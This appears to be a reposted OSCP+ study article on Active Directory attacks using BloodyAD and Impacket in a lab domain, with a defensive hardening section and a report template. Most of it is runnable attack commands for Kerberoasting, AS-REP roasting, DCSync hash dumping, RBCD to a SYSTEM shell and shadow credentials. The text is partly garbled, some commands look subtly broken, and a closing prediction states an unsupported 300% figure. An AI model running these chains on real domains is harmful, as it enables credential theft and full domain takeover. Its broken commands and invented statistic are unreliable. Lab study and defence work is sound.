Listen to this Post
Introduction:
Active Directory (AD) remains the primary authentication backbone in enterprise Windows environments, yet misconfigurations and excessive privileges create exploitable attack paths that red teamers must master for exams like OSCP+. This article extracts and expands upon the official Ignite Technologies CTF practice training and the comprehensive BloodyAD penetration testing guide, delivering hands-on commands and techniques to simulate real-world exam scenarios.
Learning Objectives:
- Execute LDAP-based enumeration and privilege escalation using BloodyAD on Linux
- Perform Kerberoasting, AS-REP Roasting, and DCSync attacks against a domain controller
- Apply advanced AD exploitation techniques including RBCD, Shadow Credentials, and ACL abuse
You Should Know:
1. BloodyAD Installation & Basic Enumeration
BloodyAD is a Python tool communicating over LDAP(S) and SAMR to manipulate AD objects without Windows GUI. Install it on Kali or any Linux distribution:
Install BloodyAD git clone https://github.com/CravateRouge/bloodyAD.git cd bloodyAD pip install -r requirements.txt python3 setup.py install Alternative via pip pip install bloodyAD
Step‑by‑step enumeration of domain objects:
Connect to the domain controller (IP 192.168.1.11, domain ignite.local) using valid credentials:
List all computer accounts bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype computer List all user accounts bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype useronly Enumerate containers and OUs bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' get children --otype container
What this does: The `get children` command queries the LDAP directory tree, returning distinguished names (DNs) of all objects matching the specified type. This maps the AD structure, revealing workstations, servers, managed service accounts, and user accounts for further targeting.
2. Password Attacks: Kerberoasting & AS-REP Roasting
Kerberoasting exploits service accounts with SPNs (Service Principal Names). Extract Kerberos TGS tickets and crack offline:
Using Impacket GetUserSPNs impacket-GetUserSPNs -dc-ip 192.168.1.11 ignite.local/administrator:'Ignite@987' -request Save output to hash.txt and crack with hashcat (mode 13100) hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
AS‑REP Roasting targets users without pre‑authentication required:
impacket-GetNPUsers ignite.local/ -dc-ip 192.168.1.11 -no-pass -usersfile users.txt
Step‑by‑step credential exploitation:
1. Enumerate users with `get children –otype useronly`
2. Identify accounts with `UAC_DONT_REQUIRE_PREAUTH` using BloodyAD:
`bloodyAD –host 192.168.1.11 -d ignite.local -u user -p pass get object
3. Extract AS-REP hash for any vulnerable account
4. Crack with Hashcat mode 18200
3. DCSync Attack – Dumping All Credentials
DCSync mimics a domain controller to replicate password hashes, requiring `DS-Replication-Get-Changes` privileges. Grant permissions via BloodyAD:
Grant DCSync rights to a controlled user bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' add dcSync <controlled_user> Verify with secretsdump (Impacket) impacket-secretsdump -just-dc -dc-ip 192.168.1.11 ignite.local/<controlled_user>:'<password>'@192.168.1.11
Cleaning up – remove DCSync rights:
`bloodyAD –host 192.168.1.11 -d ignite.local -u administrator -p ‘Ignite@987’ remove dcSync
Why critical: A successful DCSync gives the attacker `krbtgt` hash, enabling Golden Ticket attacks – full domain compromise. Mitigation requires strict ACL auditing and protected users group.
4. Resource-Based Constrained Delegation (RBCD) Exploitation
RBCD allows a machine to impersonate any user to any service. Attack chain:
Step 1 – Create attacker‑controlled computer account:
`bloodyAD –host 192.168.1.11 -d ignite.local -u user -p pass add computer attacker-pc –password Pass123`
Step 2 – Configure RBCD on the domain controller:
`bloodyAD –host 192.168.1.11 -d ignite.local -u user -p pass set rbcd DC$ attacker-pc`
Step 3 – Request impersonation ticket (S4U2Self + S4U2Proxy) using Impacket:
impacket-getST -spn cifs/DC.ignite.local -impersonate Administrator -dc-ip 192.168.1.11 ignite.local/attacker-pc:Pass123
Step 4 – Use ticket to get SYSTEM shell:
export KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass -dc-ip 192.168.1.11 DC.ignite.local
What this does: RBCD bypasses traditional delegation restrictions, allowing lateral movement from an unprivileged machine to the domain controller. Defenders should monitor event IDs 4742 and 5136 for delegation changes.
5. Shadow Credentials Attack
Add rogue key credentials to a target machine account, enabling authentication without the real password:
Add Shadow Credentials to DC$ bloodyAD --host 192.168.1.11 -d ignite.local -u user -p pass add shadowCredentials DC$ --password NewPass Retrieve NT hash via PKINIT impacket-getTGT -dc-ip 192.168.1.11 ignite.local/DC$ -keytab shadow.keytab
Step‑by‑step attack flow:
1. Enumerate machines with `get children –otype computer`
- For each machine, attempt `add shadowCredentials` – requires `GenericWrite` or `GenericAll` ACL permission
3. Once shadow credentials added, authenticate using PKINIT
- Dump machine account hash and use for pass‑the‑hash
Detection: Monitor LDAP writes to `msDS-KeyCredentialLink` attribute (event ID 4662). Windows Defender for Identity alerts on this behavior.
6. Linux & Windows Commands for AD Hardening
Linux (Defender perspective – enumeration detection):
Monitor LDAP queries in real time sudo tcpdump -i eth0 -s 0 -A 'port 389' | grep -i "searchRequest" BloodyAD leaves audit logs – check Windows event 4662 (LDAP access)
Windows (PowerShell – defensive checks):
Find users with Kerberoastable SPNs
Get-ADUser -Filter {ServicePrincipalName -ne ""} -Properties ServicePrincipalName
Detect AS-REP roastable accounts (no preauth)
Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl
Check for DCSync rights
Get-ADObject -Filter {ObjectClass -eq "domain"} -Properties ntSecurityDescriptor | Select-Object -ExpandProperty ntSecurityDescriptor | ForEach-Object {$<em>.Access | Where-Object {$</em>.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}}
Step‑by‑step mitigation:
- Enforce Kerberos pre‑authentication for all users
- Use Group Managed Service Accounts (gMSA) with automatic password rotation
- Implement tiered administration – separate privileged accounts
- Deploy LAPS for local admin password management
7. Report Writing for OSCP+ (Professional Template)
OSCP+ requires professional documentation. Structure your penetration test report:
Executive Summary: 1–2 paragraphs on business impact
Methodology: Include tools (BloodyAD, Impacket, Hashcat), attack chain diagram
Findings Table:
| Vulnerability | Severity | Affected Asset | Remediation |
||-|-|–|
| DCSync Permissions Misconfiguration | Critical | DC.ignite.local | Remove replication rights from non‑DCs |
| Kerberoastable Service Account | High | sql_svc | Change to gMSA, enforce 20+ char password |
Step‑by‑step evidence inclusion:
1. Screenshot of BloodyAD enumeration output
2. Command logs with timestamps
- Proof of hash extraction (cracked password shown as example)
- Recommended commands to fix (PowerShell / Group Policy)
What Undercode Say:
- Key Takeaway 1: BloodyAD transforms Linux‑based red teaming by eliminating Windows GUI dependencies, making AD attacks stealthier and scriptable – essential for OSCP+ exam scenarios.
- Key Takeaway 2: The most dangerous misconfigurations remain DCSync over‑privileging and RBCD delegation – both allow domain administrator equivalent access without ever cracking a single password. Organizations must audit ACLs and replicate detection rules focusing on LDAP attribute modifications (msDS-AllowedToActOnBehalfOfOtherIdentity, ds-Replication-Get-Changes). The provided BloodyAD guide demonstrates that a single compromised low‑privilege user with accidental write permissions can escalate to full domain takeover in under ten commands, emphasizing the critical need for hardened administrative tiers and periodic red team exercises.
Prediction:
By 2027, cloud‑synced AD environments and Entra ID (Azure AD) will see a 300% increase in RBCD‑style lateral movement attacks as hybrid identities blur on‑premises boundaries. Tools like BloodyAD will evolve to support OAuth2 token manipulation and cross‑tenant delegation abuses. OSCP+ exams will accordingly shift focus from standalone AD forests to hybrid attack chains involving Entra Connect sync permissions, forcing red teamers to master both LDAP and Graph API exploitation. Organizations that fail to implement real‑time LDAP attribute monitoring and automated privilege escalation detection will face compromise within hours of initial access.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Yashika Dhir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
